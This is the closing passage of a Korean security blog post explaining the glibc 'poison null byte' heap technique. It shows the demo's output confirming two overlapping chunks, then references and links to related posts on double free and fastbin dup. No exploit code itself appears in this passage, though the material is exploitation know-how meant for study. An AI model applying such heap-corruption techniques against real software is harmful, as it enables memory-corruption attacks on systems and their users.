</pre></table></code></div></div><p>새로 할당한 <code class="language-plaintext highlighter-rouge">d</code>와 <code class="language-plaintext highlighter-rouge">b2</code>가 overlapping 된다. <code class="language-plaintext highlighter-rouge">d</code>를 <code class="language-plaintext highlighter-rouge">D</code>로 <code class="language-plaintext highlighter-rouge">memset()</code> 한 후 <code class="language-plaintext highlighter-rouge">b2</code>를 확인하면 <code class="language-plaintext highlighter-rouge">D</code>로 저장되있는 것을 확인할 수 있다.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>Finally, we allocate 'd', overlapping 'b2'.
d: 0x603120
Now 'd' and 'b2' overlap.
New b2 content:
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
Thanks to https://www.contextis.com/resources/white-papers/glibc-adventures-the-forgotten-chunksfor the clear explanation of this technique.
</pre></table></code></div></div><h2 id="references">References</h2><ul><li><a href="https://www.lazenca.net/display/TEC/Poison+null+byte">Poison null byte</a><li><a href="https://code1018.tistory.com/220">(how2heap) - posion null byte</a></ul></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/exploitation/'>Exploitation</a>, <a href='/categories/heap/'>Heap</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/exploitation/" class="post-tag no-text-decoration" >exploitation</a> <a href="/tags/heap/" class="post-tag no-text-decoration" >heap</a> <a href="/tags/poison-null-byte/" class="post-tag no-text-decoration" >poison null byte</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Poison Null Byte - BS Blog&url=https://beomsu317.github.io/posts/poison-null-byte/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Poison Null Byte - BS Blog&u=https://beomsu317.github.io/posts/poison-null-byte/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Poison Null Byte - BS Blog&url=https://beomsu317.github.io/posts/poison-null-byte/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/android/">android</a> <a class="post-tag" href="/tags/exploitation/">exploitation</a> <a class="post-tag" href="/tags/algorithm/">algorithm</a> <a class="post-tag" href="/tags/dynamic-programming/">dynamic programming</a> <a class="post-tag" href="/tags/heap/">heap</a> <a class="post-tag" href="/tags/stack/">stack</a> <a class="post-tag" href="/tags/kernel/">kernel</a> <a class="post-tag" href="/tags/dagger/">dagger</a> <a class="post-tag" href="/tags/house-of-series/">house of series</a> <a class="post-tag" href="/tags/return-oriented-programming/">return-oriented programming</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/malloc-basic/"><div class="card-body"> <span class="timeago small" > Feb 25, 2020 <i class="unloaded">2020-02-25T00:00:00+09:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Malloc Basic</h3><div class="text-muted small"><p> Arena malloc()에서 메모리 영역과 메모리 관리 부분을 arena라고 한다. Main Arena malloc.c 에서 struct malloc_state 구조체를 사용하는 변수이다. static struct malloc_state main_arena = { .mutex = _LIBC_LOCK_INITIALIZER, .next =...</p></div></div></a></div><div class="card"> <a href="/posts/double-free-bug/"><div class="card-body"> <span class="timeago small" > Mar 1, 2020 <i class="unloaded">2020-03-01T00:00:00+09:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Double Free Bug</h3><div class="text-muted small"><p> Description free를 두 번할 경우 발생하는 버그이다. free가 호출될 때 인접한 free chunk가 있다면 더 큰 free chunk로 병합된다. chunk가 병합될 때 unlink 매크로가 발생한다. unlink 매크로를 통해 원하는 공간에 원하는 값을 입력할 수 있다. unlink를 공격하는 방법은 glibc 2.3.2 버전 이하...</p></div></div></a></div><div class="card"> <a href="/posts/fastbin-dup-into-stack/"><div class="card-body"> <span class="timeago small" > Mar 2, 2020 <i class="unloaded">2020-03-02T00:00:00+09:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Fastbin dup into Stack</h3><div class="text-muted small"><p> Conditions 공격자에 의해 동일한 크기의 fast chunk의 할당과 해제가 자유로워야 한다. 공격자에 의해 해제된 fast chunk를 한 번 더 해제할 수 있어야 한다.(Double Free Bug) 공격자에 의해 할당된 fast chunk 영역에 값을 저장할 수 있어야 한다. 할당 받고자 하는 stack 영역에 해제된 f...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/overlapping-chunks/" class="btn btn-outline-primary" prompt="Older"><p>Overlapping Chunks</p></a> <a href="/posts/tcache-dup/" class="btn btn-outline-primary" prompt="Newer"><p>tcache dup</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2021 <a href="https://github.com/beomsu317">Beomsu Lee</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/android/">android</a> <a class="post-tag" href="/tags/exploitation/">exploitation</a> <a class="post-tag" href="/tags/algorithm/">algorithm</a> <a class="post-tag" href="/tags/dynamic-programming/">dynamic programming</a> <a class="post-tag" href="/tags/heap/">heap</a> <a class="post-tag" href="/tags/stack/">stack</a> <a class="post-tag" href="/tags/kernel/">kernel</a> <a class="post-tag" href="/tags/dagger/">dagger</a> <a class="post-tag" href="/tags/house-of-series/">house of series</a> <a class="post-tag" href="/tags/return-oriented-programming/">return oriented programming</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><script src="https://cdn.jsdelivr.net/npm/mermaid@8/dist/mermaid.min.js"></script> <script> $(function() { let initTheme = "default"; if ($("html[mode=dark]").length > 0 || ($("html[mode]").length == 0 && window.matchMedia("(prefers-color-scheme: dark)").matches ) ) { initTheme = "dark"; } let mermaidConf = { theme: initTheme /* <default|dark|forest|neutral> */ }; /* Markdown converts to HTML */ $("pre").has("code.language-mermaid").each(function() { let svgCode = $(this).children().html(); $(this).addClass("unloaded"); $(this).after(`<div class=\"mermaid\">${svgCode}</div>`); }); mermaid.initialize(mermaidConf); }); </script><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://beomsu317.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script async src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script> /* see: <https://docs.mathjax.org/en/latest/options/input/tex.html#tex-options> */ MathJax = { tex: { inlineMath: [ /* start/end delimiter pairs for in-line math */ ['$','$'], ['\\(','\\)'] ], displayMath: [ /* start/end delimiter pairs for display math */ ['$$', '$$'], ['\\[', '\\]'] ] } }; </script> <script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script> <script type="text/javascript" id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"> </script>
